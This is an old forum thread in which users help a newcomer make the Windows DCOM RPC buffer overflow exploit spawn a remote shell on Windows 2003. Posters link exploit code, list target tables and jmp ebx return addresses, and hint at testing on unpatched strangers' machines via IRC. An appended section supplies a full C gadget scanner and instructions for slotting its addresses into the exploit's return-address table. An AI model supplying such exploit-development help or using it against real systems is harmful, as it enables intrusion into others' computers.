Full Version: Old, But A Goodie
EXPLOiTED
Hey, I just started looking into exploits and want to learn more about them and the new ones that come out rapidly. I was testing some within my home network. I started with DCOM, for which I used the compiled Cygwin DLL version (/dcom <Target ID> <Target IP>). Trying it on my 2003 machine, it got in, therefore causing the RPC service to shut down/start, shut down/start, and the same with the PC. I was expecting a remote shell to spawn. Did I do something wrong?
vnet576
You need to find an offset for Win2k3. The default DCOM exploit only has universal offsets for 2k and XP.
EXPLOiTED
Oh, I see. Yeah, I saw something about offsets. Is there a file to figure it out? Isn't it one of the DLLs in the OS?
icenix
New ones?
Don't worry, dude... DCOM and RPC exploits are so common...
The easiest way is to get yourself an IRC client and log onto dal.net...
It's like a breeding ground for script kiddies and unpatched M$ boxes...
Perfect for testing... not that I'm encouraging it...

I've got you a couple of links that you might be interested in:

http://www.k-otik.com/exploits/07.30.dcom48.c
an exploit (very messy)

http://www.ntisys.com/bulletins/MS-DCOM-exploits.html
this is a good link if you're wanting to find the most common Windows exploits (DCOM / RPC)

http://www.securiteam.com/exploits/5WP0B20B5C.html
a better exploit

http://www.securiteam.com/exploits/6Q0042K8KA.html
another exploit

My suggestion, if you're looking for exploits, is to check out securiteam.com.
It's full of useful information.
It's my first stop...

ch33rs
icenix


r3L4x
Hmm, I can never get those things to work.
Flowby
Hi Relax!!! LOL
What problem do you have?
JaX
There is a DCOM with a universal offset out there.
pita
Maybe take a look at this nice article:
http://www.nextgenss.com/papers/defeating-...-protection.pdf
Dinos
I did that some time ago and it's quite nice and working. If somebody is interested, just tell me where to upload the file.

$new/win3
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Rewritten adding generic hosts - Dinos
- Usage: new/win3 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
- 7 Windows 2000 (Generic)
- 8 Windows XP (Generic)

Regards,
Dinos
pita
I think that you don't understand: he wants to exploit his Windows 2003 server, so your "magical" ret for 2k and XP will simply not work for 2k3...

Although, if you look at the Metasploit exploit for DCOM
( http://www.metasploit.com/releases.html )

they say that they use jmp ebx, so I think, at first view, that you have to search for a jmp ebx.

Values for 2003 Server (US) are:

--=[ ntdll.dll ]=--
jmp ebx 0x77fb5d83

--=[ kernel32.dll ]=--
jmp ebx 0x77ece3ca
jmp ebx 0x77eda8e3

--=[ msvcrt.dll ]=--
jmp ebx 0x77ba8ef8
jmp ebx 0x77ba96d5
jmp ebx 0x77bb31b1

So maybe you will need to use one of them in place of your ret and that will spawn the shell, but I don't have 2k3, so I can't help you more than this.
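The jmp ebx values quoted above are exactly what a gadget scan of a DLL produces: the header's ImageBase, plus the section's VirtualAddress, plus the offset of the two-byte opcode FF E3 inside that section. The program below is an added example for this thread, not code from any poster, from the DCOM exploit or from Metasploit. It parses a PE32 header by hand (no Windows headers needed, so it builds on Linux or Cygwin), scans every section's raw data for jmp ebx (FF E3) and call ebx (FF D3), and prints the virtual address of each. With no argument it runs against a constructed in-memory image whose ImageBase 0x10000000 and single .text section are assumed values made up here; given a path, it scans a real file such as a copy of ntdll.dll, kernel32.dll or msvcrt.dll taken from the target box. The addresses it prints are only valid for that exact DLL build and service pack and for the DLL's default load address.

```c
/* Scan a PE32 image for "jmp ebx" (FF E3) and "call ebx" (FF D3) and report
 * the virtual address of each: ImageBase + section VirtualAddress + offset.
 * Added example for this thread. build_sample_pe() constructs a fake image;
 * its ImageBase 0x10000000 and section layout are assumed values. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    uint32_t va;        /* virtual address at the header's ImageBase */
    const char *mnem;   /* "jmp ebx" or "call ebx" */
} gadget_t;

/* Little-endian field access; PE headers are always little-endian. */
static uint16_t rd16(const uint8_t *b, size_t o) { return (uint16_t)(b[o] | (b[o + 1] << 8)); }
static uint32_t rd32(const uint8_t *b, size_t o) {
    return (uint32_t)b[o] | ((uint32_t)b[o + 1] << 8) | ((uint32_t)b[o + 2] << 16) | ((uint32_t)b[o + 3] << 24);
}
static void wr16(uint8_t *b, size_t o, uint16_t v) { b[o] = v & 0xFF; b[o + 1] = v >> 8; }
static void wr32(uint8_t *b, size_t o, uint32_t v) { for (int i = 0; i < 4; i++) b[o + i] = (v >> (8 * i)) & 0xFF; }

/* Walk the PE headers and scan each section's raw data. Returns the number of
 * gadgets stored in out (at most max_out); 0 for a malformed or truncated
 * image. Every header read is bounds-checked against len first. */
size_t find_ebx_gadgets(const uint8_t *img, size_t len, gadget_t *out, size_t max_out)
{
    size_t n = 0;
    if (len < 0x40 || rd16(img, 0) != 0x5A4D) return 0;            /* "MZ" */
    uint32_t pe = rd32(img, 0x3C);                                   /* e_lfanew */
    if (pe > len - 24 || rd32(img, pe) != 0x00004550) return 0;      /* "PE\0\0" */
    uint16_t nsec = rd16(img, pe + 6);                               /* NumberOfSections */
    uint16_t opt_size = rd16(img, pe + 20);                          /* SizeOfOptionalHeader */
    size_t opt = (size_t)pe + 24;
    if (opt_size < 32 || opt + opt_size > len || rd16(img, opt) != 0x10B) return 0; /* PE32 only */
    uint32_t image_base = rd32(img, opt + 28);                       /* OptionalHeader.ImageBase */
    size_t sec = opt + opt_size;                                     /* first IMAGE_SECTION_HEADER */
    for (uint16_t s = 0; s < nsec; s++, sec += 40) {
        if (sec + 40 > len) return n;
        uint32_t rva  = rd32(img, sec + 12);                         /* VirtualAddress */
        uint32_t size = rd32(img, sec + 16);                         /* SizeOfRawData */
        uint32_t raw  = rd32(img, sec + 20);                         /* PointerToRawData */
        if (raw > len || size > len - raw) return n;                 /* raw data past end of file */
        for (uint32_t i = 0; i + 1 < size; i++) {
            const uint8_t *p = img + raw + i;
            const char *m = NULL;
            if (p[0] == 0xFF && p[1] == 0xE3) m = "jmp ebx";
            else if (p[0] == 0xFF && p[1] == 0xD3) m = "call ebx";
            if (m && n < max_out) { out[n].va = image_base + rva + i; out[n].mnem = m; n++; }
        }
    }
    return n;
}

/* Constructed sample: a minimal PE32 image with one ".text" section (RVA 0x1000,
 * raw data at 0x200) holding a jmp ebx at section offset 0x10 and a call ebx at
 * 0x20. Returns the image size written, or 0 if cap is too small. */
size_t build_sample_pe(uint8_t *buf, size_t cap, uint32_t image_base)
{
    const uint32_t pe = 0x40, opt = pe + 24, opt_size = 224, sec = opt + opt_size;
    const uint32_t raw = 0x200, raw_size = 0x200, rva = 0x1000;
    if (cap < raw + raw_size) return 0;
    memset(buf, 0, raw + raw_size);
    wr16(buf, 0, 0x5A4D); wr32(buf, 0x3C, pe);
    wr32(buf, pe, 0x00004550);
    wr16(buf, pe + 4, 0x014C);                   /* Machine: i386 */
    wr16(buf, pe + 6, 1);                        /* one section */
    wr16(buf, pe + 20, (uint16_t)opt_size);
    wr16(buf, opt, 0x10B);                       /* PE32 magic */
    wr32(buf, opt + 28, image_base);
    memcpy(buf + sec, ".text\0\0\0", 8);
    wr32(buf, sec + 8, raw_size); wr32(buf, sec + 12, rva);
    wr32(buf, sec + 16, raw_size); wr32(buf, sec + 20, raw);
    memset(buf + raw, 0x90, raw_size);           /* NOP filler */
    buf[raw + 0x10] = 0xFF; buf[raw + 0x11] = 0xE3;   /* jmp ebx */
    buf[raw + 0x20] = 0xFF; buf[raw + 0x21] = 0xD3;   /* call ebx */
    return raw + raw_size;
}

/* Scan the constructed image and return the VA of the idx-th gadget, or 0 if
 * none; len_limit truncates the image to exercise the bounds checks. */
uint32_t sample_gadget_va(size_t idx, size_t len_limit)
{
    static uint8_t buf[0x400];
    gadget_t g[8];
    size_t len = build_sample_pe(buf, sizeof buf, 0x10000000);
    if (len_limit < len) len = len_limit;
    size_t n = find_ebx_gadgets(buf, len, g, 8);
    return idx < n ? g[idx].va : 0;
}

int main(int argc, char **argv)
{
    static uint8_t img[4 << 20];
    size_t len;
    if (argc > 1) {                              /* e.g. ./scan ntdll.dll */
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 1; }
        len = fread(img, 1, sizeof img, f);
        fclose(f);
    } else {
        len = build_sample_pe(img, sizeof img, 0x10000000);   /* constructed image */
    }
    gadget_t g[256];
    size_t n = find_ebx_gadgets(img, len, g, 256);
    for (size_t i = 0; i < n; i++) printf("%-8s 0x%08x\n", g[i].mnem, (unsigned)g[i].va);
    return 0;
}
```

The value goes into the exploit's target table the same way HDM's version stores a ret per target: written little-endian into the slot that overwrites the saved return address. A candidate whose bytes contain 0x00 or other characters the RPC request cannot carry is useless even though the scanner reports it, so check the printed addresses against the exploit's bad-character constraints before picking one.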